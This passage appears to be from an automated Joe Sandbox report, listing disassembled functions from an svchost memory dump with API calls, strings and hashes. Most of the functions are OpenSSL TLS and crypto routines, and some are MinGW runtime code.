                                                                                              • Instruction Fuzzy Hash: 8C413C35280B0085EB24DF32D8903AE27A5FB99BECF095226DE1E577A4DF38C495CB50
                                                                                              Function 64942C10 Relevance: 9.1, APIs: 6, Instructions: 97synchronizationthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 64942C62
                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,64941698), ref: 64942CAD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 1728940165-0
                                                                                              • Opcode ID: ad35e8303b8d8428d97bb6b51cf9c3b71cc4d122781135cfe85f96bea711820f
                                                                                              • Instruction ID: 34c95b49e9a65028a90b0e91656b60c0aa03b26a43158414cd96aabb3d2393cf
                                                                                              • Opcode Fuzzy Hash: ad35e8303b8d8428d97bb6b51cf9c3b71cc4d122781135cfe85f96bea711820f
                                                                                              • Instruction Fuzzy Hash: 7931A5367812058BEB068F35E94078A22A6F745BDEF288574CE0CCB344FE39C891C760
                                                                                              Function 00007FFBAB470320 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID:
                                                                                              • API String ID: 193678381-0
                                                                                              • Opcode ID: 61fa397787caf25eaa4b742d0cb67a0d4579aba6294d03ea4509ec8742b787dd
                                                                                              • Instruction ID: c8ef18f58532dd6d909f3f4e8938eeac16a3d2b345766bb3a65d13fab558625d
                                                                                              • Opcode Fuzzy Hash: 61fa397787caf25eaa4b742d0cb67a0d4579aba6294d03ea4509ec8742b787dd
                                                                                              • Instruction Fuzzy Hash: 54311C72B1A19143E7A1E73AE4417BE2750DB847A4F185631EE3947BE6CF2CD4C28B00
                                                                                              Function 00007FFBAB4447A0 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: N_clear_freeN_dup$N_exP_create_verifier_P_get_default_g
                                                                                              • String ID:
                                                                                              • API String ID: 1503022457-0
                                                                                              • Opcode ID: 41c8a718d5ef2048157d7b1b3aad18ac4771f11d7c76a97dd794f12c5b188bbb
                                                                                              • Instruction ID: aba11bc865423aafad9e4fa39b91144361d10c072aadf0ea0d3657a871124f7c
                                                                                              • Opcode Fuzzy Hash: 41c8a718d5ef2048157d7b1b3aad18ac4771f11d7c76a97dd794f12c5b188bbb
                                                                                              • Instruction Fuzzy Hash: E5319176606FC18AEB65DF26E8903A97390FB44B98F148135EE5D4BBA5DF38D111C300
                                                                                              Function 00007FFBAB488C50 Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB42EF20: ERR_set_mark.LIBCRYPTO-3-X64(?,00007FFBAB4169A9), ref: 00007FFBAB42EF4C
                                                                                                • Part of subcall function 00007FFBAB42EF20: OBJ_nid2sn.LIBCRYPTO-3-X64(?,00007FFBAB4169A9), ref: 00007FFBAB42EF53
                                                                                                • Part of subcall function 00007FFBAB42EF20: EVP_MD_fetch.LIBCRYPTO-3-X64(?,00007FFBAB4169A9), ref: 00007FFBAB42EF61
                                                                                                • Part of subcall function 00007FFBAB42EF20: ERR_pop_to_mark.LIBCRYPTO-3-X64(?,00007FFBAB4169A9), ref: 00007FFBAB42EF69
                                                                                              • EVP_MD_CTX_new.LIBCRYPTO-3-X64 ref: 00007FFBAB488CA3
                                                                                              • EVP_DigestUpdate.LIBCRYPTO-3-X64 ref: 00007FFBAB488CCF
                                                                                              • EVP_DigestUpdate.LIBCRYPTO-3-X64 ref: 00007FFBAB488CE8
                                                                                              • EVP_DigestFinal_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB488CFC
                                                                                              • EVP_MD_CTX_free.LIBCRYPTO-3-X64 ref: 00007FFBAB488D08
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$Update$D_fetchFinal_exJ_nid2snR_pop_to_markR_set_markX_freeX_new
                                                                                              • String ID:
                                                                                              • API String ID: 2716796635-0
                                                                                              • Opcode ID: 040979c296403f6e5b7288cf58e327e0d8e0b2a3e2ee1bf480cba364f95aee1c
                                                                                              • Instruction ID: 9b80b2f8b809b6efe8f5c6b939eb55d46150f136113f007a9b139e973b7b76db
                                                                                              • Opcode Fuzzy Hash: 040979c296403f6e5b7288cf58e327e0d8e0b2a3e2ee1bf480cba364f95aee1c
                                                                                              • Instruction Fuzzy Hash: EB21C991B4E74240E666E776F5412BDA7A19F89BC0F189031FF6E477ABDE2CE4414304
                                                                                              Function 64945340 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleValue$_endthreadex
                                                                                              • String ID:
                                                                                              • API String ID: 3955988603-0
                                                                                              • Opcode ID: b7945b1e01c22a34e39ac6e8360c113142cd86d22e17861272ae90291c3e3858
                                                                                              • Instruction ID: 91f102dbb4e4c7d839af2ef950484d69c9086b08797906d5a721fd90f77057ec
                                                                                              • Opcode Fuzzy Hash: b7945b1e01c22a34e39ac6e8360c113142cd86d22e17861272ae90291c3e3858
                                                                                              • Instruction Fuzzy Hash: C0217932285B40C2EB1ADF61E45436D3BB6EB85F68F594029CF0A0B394DFB9C849C750
                                                                                              Function 64947A00 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 295memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,?,?,?,?,64949064,?,?,?,?,649412F5), ref: 64947BB0
                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,64949064,?,?,?,?,649412F5), ref: 64947BD2
                                                                                              Strings
                                                                                              • Unknown pseudo relocation bit size %d., xrefs: 64947C8C
                                                                                              • VirtualQuery failed for %d bytes at address %p, xrefs: 649479CC, 64947CD6
                                                                                              • Unknown pseudo relocation protocol version %d., xrefs: 64947CED
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$ProtectQuery
                                                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                              • API String ID: 1027372294-974437099
                                                                                              • Opcode ID: e0f154f0bd97eae7fb13bd6116e2de9bfce756cd8e3c01188d1299480cc220fd
                                                                                              • Instruction ID: dbc6561fcfc5939c46aa7cdc6d716169bef66825e7e028ef0cbcfa92e83a18d9
                                                                                              • Opcode Fuzzy Hash: e0f154f0bd97eae7fb13bd6116e2de9bfce756cd8e3c01188d1299480cc220fd
                                                                                              • Instruction Fuzzy Hash: 3FA165797916084AFB00EB31E89031A7363F745BE8F048A61CE1C4B7A8DB3DC586C350
                                                                                              Function 00007FFBAB42C0DF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_write_early_data$ssl\ssl_lib.c
                                                                                              • API String ID: 1552677711-3931977519
                                                                                              • Opcode ID: 348dcd838913dc03cc3b36777d7fea066f80cc32c0fb1622a69fd2f15e5751b3
                                                                                              • Instruction ID: e436801f5d22b3c25a8f5d0e0756515d0c30409ef7b3fd0c42000575e5bf9541
                                                                                              • Opcode Fuzzy Hash: 348dcd838913dc03cc3b36777d7fea066f80cc32c0fb1622a69fd2f15e5751b3
                                                                                              • Instruction Fuzzy Hash: 64417EB2A0E64286FAA69F75D5923BD7390FF41740F148436CE2D436A2DF3CE4959B01
                                                                                              Function 00007FFBAB43B010 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl\t1_lib.c$tls12_copy_sigalgs
                                                                                              • API String ID: 1552677711-2385470557
                                                                                              • Opcode ID: 58abd506804eec2907d3acb6c9fdcd5d9494638027979cbd427d373299436f81
                                                                                              • Instruction ID: ba2217127bec41917702441a3ae0bdfeeb1f6491b46d3200d60851d7d14952d9
                                                                                              • Opcode Fuzzy Hash: 58abd506804eec2907d3acb6c9fdcd5d9494638027979cbd427d373299436f81
                                                                                              • Instruction Fuzzy Hash: 3E31A7A3B0A65282E7669B26D58437E23A1EB44B80F1CC431EE6C476A5DE3ED880C740
                                                                                              Function 00007FFBAB440372 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_indentO_printf
                                                                                              • String ID: %s (%d)
                                                                                              • API String ID: 1860387303-2206749211
                                                                                              • Opcode ID: 08b5bfe54d974706d67bed0f7f65379c65b6c8027aacb01334adf5610ed9290b
                                                                                              • Instruction ID: 65c430236495d1db4750eec3cae70f0127a32862a8157e27fea278d6370c427a
                                                                                              • Opcode Fuzzy Hash: 08b5bfe54d974706d67bed0f7f65379c65b6c8027aacb01334adf5610ed9290b
                                                                                              • Instruction Fuzzy Hash: 5631D3B2B0E69286EF6B8B31D4611BD2F51AB45B90F04C432CEAC077A2DE7CE5618700
                                                                                              Function 00007FFBAB484BB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_parse_ctos_client_cert_type
                                                                                              • API String ID: 193678381-2187535903
                                                                                              • Opcode ID: a0df0ec2b0c4ca5525618f5e6cffa68395d75fab59e484bf3628410bd0089639
                                                                                              • Instruction ID: 9d09da9e3d2b47cff970c034219a9dbe7058c756bfefedaf0e2b144acff01f75
                                                                                              • Opcode Fuzzy Hash: a0df0ec2b0c4ca5525618f5e6cffa68395d75fab59e484bf3628410bd0089639
                                                                                              • Instruction Fuzzy Hash: 5321D3E2B0A68286EB42CBB5D4013F92390EF51788F04C431EE9D476B6EF2CD5958311
                                                                                              Function 00007FFBAB4847E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$O_zallocR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_supported_versions
                                                                                              • API String ID: 3661993454-4203788918
                                                                                              • Opcode ID: 0d8c01ad44f015bf23749a31f02f3c04219228765ccaf1e70f6f178e2eb9a7a7
                                                                                              • Instruction ID: 5371ad85e7a0c226d8a6edc6e921168f6b01a1017c475c01e3e96da1e27c8452
                                                                                              • Opcode Fuzzy Hash: 0d8c01ad44f015bf23749a31f02f3c04219228765ccaf1e70f6f178e2eb9a7a7
                                                                                              • Instruction Fuzzy Hash: AB218EA1F0A18242FA6297B6E9917B91391AF847C0F04C031EE2D876F6DF2DE9858300
                                                                                              Function 00007FFBAB41A970 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl3_do_change_cipher_spec$ssl\s3_msg.c
                                                                                              • API String ID: 1552677711-2944025119
                                                                                              • Opcode ID: ad1e7d3c941517d6f17de9c1cf47e1a4117bab22cf195348e66dc2d02bf2a5da
                                                                                              • Instruction ID: 07448c9d07944e184a22e189aa9bad68ffb0434a159d89d2f466d8ba9eb0faa9
                                                                                              • Opcode Fuzzy Hash: ad1e7d3c941517d6f17de9c1cf47e1a4117bab22cf195348e66dc2d02bf2a5da
                                                                                              • Instruction Fuzzy Hash: 632175B2B1A74182E7459B35E4863BD23A0EB54B84F588436DE2D473B5DF38C8D6C300
                                                                                              Function 00007FFBAB48CC10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugmemcpymemset
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_next_proto
                                                                                              • API String ID: 2334240134-950454232
                                                                                              • Opcode ID: 99744c31a9a6a3c705792112e2e6bf0cb08241c1d2a8805dc1ecf0a91c0cdafb
                                                                                              • Instruction ID: db333fd6b6c39d6b3021e360be454ce9cbc3ac303517a1a546da5642b61dde95
                                                                                              • Opcode Fuzzy Hash: 99744c31a9a6a3c705792112e2e6bf0cb08241c1d2a8805dc1ecf0a91c0cdafb
                                                                                              • Instruction Fuzzy Hash: 4311B2A2B1D78281E751D772F8457EA6320EB84BC4F449031EE6D87BA6DE2DE5818700
                                                                                              Function 00007FFBAB440B5F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_indentO_printf
                                                                                              • String ID: %s=0x%x (%s)$cookie$server_version
                                                                                              • API String ID: 1860387303-2821402668
                                                                                              • Opcode ID: dc55b136458b3956da420a4ced34826eb6fd4667b45e9e87ee36ed3099cd13aa
                                                                                              • Instruction ID: a5681995522ecf8121efb770a393b60d59b62ee7913ac9dff392dde7e8ecd4a7
                                                                                              • Opcode Fuzzy Hash: dc55b136458b3956da420a4ced34826eb6fd4667b45e9e87ee36ed3099cd13aa
                                                                                              • Instruction Fuzzy Hash: 041134B2B0A6D142EA168B74E4250B87A02EB80328F01C232CEBC027F1CE3CD5A6C304
                                                                                              Function 00007FFBAB490FE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB46F3F2), ref: 00007FFBAB490FFC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB46F3F2), ref: 00007FFBAB491014
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • BIO_set_flags.LIBCRYPTO-3-X64(?,00007FFBAB46F3F2), ref: 00007FFBAB49106C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_set_flagsR_newR_set_debugR_vset_error
                                                                                              • String ID: dtls1_read_failed$ssl\statem\statem_dtls.c
                                                                                              • API String ID: 617247779-2547669737
                                                                                              • Opcode ID: e64f7d3fdb65d1a11c8079e2c9def8cf12f6eae16bcb5b8bc65eaf0d7f2e0a76
                                                                                              • Instruction ID: 713b2843d0a8e098292924131240e23220d2268ce62886cbfd8d680661cc512e
                                                                                              • Opcode Fuzzy Hash: e64f7d3fdb65d1a11c8079e2c9def8cf12f6eae16bcb5b8bc65eaf0d7f2e0a76
                                                                                              • Instruction Fuzzy Hash: 62016DA1F5A14356F6A2A77AE9936BE12509F847C0F089031EE3D876B7ED2DE8804640
                                                                                              Function 00007FFBAB460210 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_rstream_queue_data$ssl\quic\quic_rstream.c
                                                                                              • API String ID: 1552677711-468918440
                                                                                              • Opcode ID: 07d302c16cb975c7cbcdc96ac8009da06d46e2be223d517764e6b9399bc91862
                                                                                              • Instruction ID: deb54e4a602e880cb6db51d1a25d230cb9d937d050803cf854eb30e482428e01
                                                                                              • Opcode Fuzzy Hash: 07d302c16cb975c7cbcdc96ac8009da06d46e2be223d517764e6b9399bc91862
                                                                                              • Instruction Fuzzy Hash: 1611A7A1B1A68182FEA79735E4A237E2351BF95740F90D039ED5D427A5DE3CE8098A01
                                                                                              Function 00007FFBAB414900 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
